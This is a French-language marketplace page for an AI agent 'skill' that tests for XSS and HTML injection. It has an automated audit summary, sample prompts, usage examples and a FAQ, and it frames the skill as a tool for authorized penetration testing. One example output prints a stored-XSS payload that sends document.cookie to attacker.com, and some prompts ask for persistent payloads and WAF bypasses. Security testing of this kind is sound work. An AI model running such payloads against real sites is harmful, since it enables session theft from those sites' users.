Compétences xss-html-injection
📦

xss-html-injection

Sûr ⚡ Contient des scripts⚙️ Commandes externes🌐 Accès réseau📁 Accès au système de fichiers

Test des vulnérabilités XSS et d'injection HTML

Les applications web contiennent souvent des failles de cross-site scripting et d'injection HTML que les attaquants exploitent pour voler des sessions et des identifiants. Cette compétence fournit une méthodologie systématique pour détecter, exploiter et valider les vulnérabilités d'injection côté client dans le cadre d'évaluations de sécurité autorisées.

Prend en charge: Claude Codex Code(CC)
🥉 73 Bronze
1

Télécharger le ZIP du skill

2

Importer dans Claude

Allez dans Paramètres → Capacités → Skills → Importer un skill

3

Activez et commencez à utiliser

Tester

Utilisation de "xss-html-injection". Tester le paramètre de recherche pour les XSS réfléchies

Résultat attendu:

  • Vulnérabilité trouvée : XSS réfléchie dans le paramètre /search?q=
  • Sévérité : Moyenne
  • Payload : <img src=x onerror=alert(document.domain)>
  • Contexte : Corps HTML - réflexion non encodée
  • Recommandation : Implémenter l'encodage de sortie pour toutes les entrées utilisateur

Utilisation de "xss-html-injection". Tester le champ bio du profil utilisateur pour les XSS stockées

Résultat attendu:

  • Vulnérabilité trouvée : XSS stockée dans la bio du profil utilisateur
  • Sévérité : Élevée (persistante, affecte tous les utilisateurs)
  • Payload : <script>fetch('https://attacker.com/log?c='+document.cookie)</script>
  • Impact : Détournement de session pour tous les utilisateurs affichant le profil
  • Recommandation : Implémenter une validation stricte des entrées et un encodage de sortie

Audit de sécurité

Sûr
v1 • 2/25/2026

This is a legitimate security testing skill for XSS and HTML injection vulnerability assessment. All 121 static findings are FALSE POSITIVES - they represent educational examples of vulnerable code patterns (eval, innerHTML, document.write) and demonstration payloads using example URLs (attacker.com). The skill teaches security professionals how to identify and test for client-side injection vulnerabilities in authorized penetration tests.

1
Fichiers analysés
505
Lignes analysées
5
résultats
1
Total des audits
Problèmes à risque faible (1)
Educational Security Testing Content - False Positives
All 121 static findings are FALSE POSITIVES. The skill contains: (1) Examples of vulnerable code patterns (eval, innerHTML, document.write at lines 190,194,195,198,319,328,467) - teaching testers to identify these sinks; (2) Demonstration payloads using example URLs (attacker.com) - standard practice in security documentation; (3) References to keylogger and credential access as attack vectors - essential knowledge for defenders. This is legitimate educational content for authorized penetration testing.

Facteurs de risque

⚡ Contient des scripts (7)
⚙️ Commandes externes (64)
🌐 Accès réseau (27)
📁 Accès au système de fichiers (1)

Motifs détectés

Pattern: eval() in Code ExamplesPattern: document.write and innerHTML in ExamplesPattern: Network Requests in Payloads
Audité par: claude

Score de qualité

38
Architecture
100
Maintenabilité
87
Contenu
50
Communauté
100
Sécurité
87
Conformité aux spécifications

Ce que vous pouvez construire

Consultant en Sécurité Testant des Applications Web

Effectuer des tests d'intrusion autorisés pour identifier les vulnérabilités XSS dans les applications web des clients et fournir des recommandations de correction.

Développeur Validant la Gestion des Entrées

Tester les applications web personnalisées pendant le développement pour vérifier la mise en œuvre correcte de l'assainissement des entrées et de l'encodage de sortie.

Ingénieur QA Effectuant des Tests de Régression de Sécurité

Inclure les tests XSS et d'injection HTML dans les suites de tests de régression de sécurité pour détecter les vulnérabilités avant le déploiement en production.

Essayez ces prompts

Détection XSS de Base
Use the XSS HTML injection skill to test the login form at https://example.com for reflected XSS vulnerabilities. Identify all input fields and test for basic XSS payloads.
Évaluation XSS Stockée
Use the XSS HTML injection skill to test the comment section for stored XSS. Create test payloads that persist and execute when other users view the content.
Découverte XSS Basée sur le DOM
Use the XSS HTML injection skill to analyze the JavaScript on https://example.com/dashboard for DOM-based XSS. Check location.hash and location.search handling.
Validation de Contournement de Filtre
Use the XSS HTML injection skill to test if the WAF at https://example.com blocks common XSS payloads. Try HTML encoding, Unicode encoding, and tag variation bypass techniques.

Bonnes pratiques

  • Toujours obtenir une autorisation écrite avant de tester une application cible
  • Utiliser des payloads de démonstration contrôlés qui ne persistent pas et ne se propagent pas aux utilisateurs non intentionnels
  • Signaler immédiatement les vulnérabilités critiques via les canaux appropriés de réponse aux incidents

Éviter

  • Tester des systèmes de production sans autorisation écrite explicite
  • Utiliser les vulnérabilités découvertes pour un accès non autorisé ou une exfiltration de données
  • Déployer des payloads pouvant causer un déni de service ou des dommages au système

Foire aux questions

Cette compétence effectue-t-elle des attaques réelles sur les sites web cibles ?
Non. Cette compétence fournit une méthodologie et des payloads pour des tests de sécurité autorisés. Les utilisateurs doivent avoir une permission écrite explicite avant de tester un système.
Cette compétence peut-elle tester tous les types de XSS ?
La compétence couvre les XSS stockées, réfléchies et basées sur le DOM. Cependant, certaines variantes avancées comme la mutation XSS peuvent nécessiter des techniques spécialisées supplémentaires.
Quelle autorisation est requise avant d'utiliser cette compétence ?
Une autorisation écrite du propriétaire du système est requise. Elle doit inclure le périmètre défini, les méthodes de test autorisées et les procédures de traitement des données capturées.
Cette compétence fonctionne-t-elle contre les applications avec CSP ?
La CSP peut bloquer de nombreux payloads XSS. La compétence inclut des techniques de test de contournement CSP, mais certaines politiques CSP bien configurées peuvent empêcher l'exploitation réussie.
Les cookies de session peuvent-ils toujours être volés via XSS ?
Non. Les cookies marqués HttpOnly ne peuvent pas être accédés via JavaScript. Les applications modernes doivent utiliser cette protection pour les cookies de session.
Que dois-je faire si je trouve une vulnérabilité XSS critique ?
Signaler immédiatement via les canaux appropriés selon votre accord d'autorisation. Documenter la découverte avec une preuve de concept et fournir des recommandations de correction au propriétaire.

Détails du développeur

Structure de fichiers

📄 SKILL.md